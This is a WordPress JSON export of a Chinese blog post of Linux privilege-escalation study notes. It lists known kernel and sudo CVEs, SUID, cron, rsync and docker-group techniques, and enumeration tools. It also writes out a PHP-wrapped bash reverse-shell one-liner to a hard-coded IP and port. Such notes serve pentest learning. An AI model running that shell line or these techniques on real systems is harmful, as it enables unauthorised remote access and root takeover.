{"id":80,"date":"2024-04-12T10:00:00","date_gmt":"2023-06-01T02:00:00","guid":{"rendered":"http:\/\/123.207.45.199\/index.php\/2023\/06\/01\/%e6%9d%83%e9%99%90%e6%8f%90%e5%8d%87-linux\/"},"modified":"2026-05-31T21:58:41","modified_gmt":"2026-05-31T13:58:41","slug":"%e6%9d%83%e9%99%90%e6%8f%90%e5%8d%87-linux","status":"publish","type":"post","link":"https:\/\/www.redspear.cn\/index.php\/2024\/04\/12\/%e6%9d%83%e9%99%90%e6%8f%90%e5%8d%87-linux\/","title":{"rendered":"\u6743\u9650\u63d0\u5347-linux"},"content":{"rendered":"

\u914d\u5408\u70c2\u571f\u8c46MS16_075\uff09
\n\u6c38\u6052\u4e4b\u84dd(MS17-010)<\/p>\n

\u8513\u7075\u82b1(CVE-2021-1732)<\/p>\n

\u810f\u725b\u63d0\u6743(CVE-2016-5195)
\n\u810f\u7ba1\u63d0\u6743(CVE-2022-0847)
\nSUDO(CVE-2021-3156)
\nPolkit(CVE-2021-4034)<\/p>\n

\u603b\u7ed3:<\/p>\n

\u5229\u7528\u5177\u6709suid\u6743\u9650\u7684\u547d\u4ee4(nmap,vim,find ,cat,more…)->\u53cd\u5f39shell<\/p>\n

\u6f0f\u6d1e\u63d0\u6743(cve-2016-5195 cve-2022-0847 cve-2021-3156 cve-2021-4034)<\/p>\n

\u73af\u5883\u53d8\u91cf\u6587\u4ef6+suid<\/p>\n

\u5b9a\u65f6\u4efb\u52a1\u63d0\u6743\t=>\u76f8\u5bf9\u8def\u5f84\u548c\u7edd\u5bf9\u8def\u5f84\u6267\u884c\t\u8ba1\u5212\u4efb\u52a1\u547d\u4ee4\u5b58\u5728\u53c2\u6570\u8c03\u7528<\/p>\n

Rsync(\u672a\u6388\u6743\u8bbf\u95ee\u63d0\u6743)->873-\u8c03\u7528\/etc\/cron.hourly,\u5229\u7528rsync\u8fde\u63a5\u8986\u76d6<\/p>\n

Docker\u7ec4\u6302\u8f7d->root\u7528\u6237\u5bf9docker\u6743\u9650\u914d\u7f6e\u4e0d\u5f53<\/p>\n

\u4e00.\u4fe1\u606f\u6536\u96c6<\/p>\n

~~~
\ncurl ifconfig.me \u53ef\u89c1\u81ea\u5df1IP
\nifconfig \t\u7f51\u5361
\nid\t\u5224\u65ad\u6743\u9650
\nuname -srm \u7248\u672c\u4fe1\u606f<\/p>\n

chmod +x \u6587\u4ef6\u540d
\n*\u4e00\u4e2a\u7efc\u5408\u7c7b\u63a2\u9488\uff1ahttps:\/\/github.com\/liamg\/traitor(\u4e0a\u4f20\u540e\u76f4\u63a5\u8fd0\u884c\u5373\u53ef)\t.\/traitor<\/p>\n

\u4e00\u4e2a\u81ea\u52a8\u5316\u63d0\u6743\uff1ahttps:\/\/github.com\/AlessandroZ\/BeRoot(\u9700\u8981py\u574f\u5883)\tpython beroot.py <\/p>\n

*\u4fe1\u606f\u6536\u96c6\uff1ahttps:\/\/github.com\/rebootuser\/LinEnum(\u51fa\u7cfb\u7edf\u4fe1\u606f)=>\u6a2a\u5411\u79fb\u52a8\/\u6743\u9650\u7ef4\u6301\t.\/LinEnum.sh<\/p>\n

*\u4fe1\u606f\u6536\u96c6\uff1ahttps:\/\/github.com\/mzet-\/1inux-exploit-suggester(\u51faEXP\u4fe1\u606f)\t.\/les.sh<\/p>\n

\u6f0f\u6d1e\u63a2\u9488\uff1ahttps:\/\/github.com\/sleventyeleven\/linuxprivchecker(\u9700\u8981py\u574f\u5883)\tpython linuxprivchecker.py<\/p>\n

*\u6f0f\u6d1e\u63a2\u9488\uff1ahttps:\/\/github.com\/jondonas\/1inuX-eXp1oit-suggester-2\t\t.\/linux-exploit-suggester-2.pl<\/p>\n

\u4e8c\u8fdb\u5236\u6587\u4ef6\u63d0\u6743\u67e5\u8be2\uff1a
\nLinux:https:\/\/gtfobins.github.io\/
\nwindows:https:\/\/1o1bas-project.github.io\/<\/p>\n

set payload php\/meter–\/reverse–<\/p>\n

1go
\nsystem(‘bash -c “bash -i >& \/dev\/tcp\/192.168.43.3\/2233 0>&1″‘);
\n~~~<\/p>\n

### suid\u63d0\u6743<\/p>\n

\u539f\u7406<\/p>\n

~~~
\nSUID(Set User ID)\u662f\u4e00\u79cd\u7279\u6b8a\u7684\u6743\u9650\u8bbe\u7f6e\uff0c
\n\u7528\u4e8e\u5728\u6267\u884c\u7a0b\u5e8f\u65f6\u5c06\u6709\u6548\u7528\u6237ID(UID)\u4e34\u65f6\u66f4\u6539\u4e3a\u7a0b\u5e8f\u6587\u4ef6\u6240\u6709\u8005\u7684UID\u3002<\/p>\n

\u6f0f\u6d1e\u6210\u56e0:chmod u+s\u7ed9\u4e88\u4e86suid \tu-s\u5220\u9664\u4e86uid
\n~~~<\/p>\n

\u5229\u7528<\/p>\n

~~~
\nhttps:\/\/gtfobins.github.io\/<\/p>\n

SUID Executables<\/a><\/p><\/blockquote>\n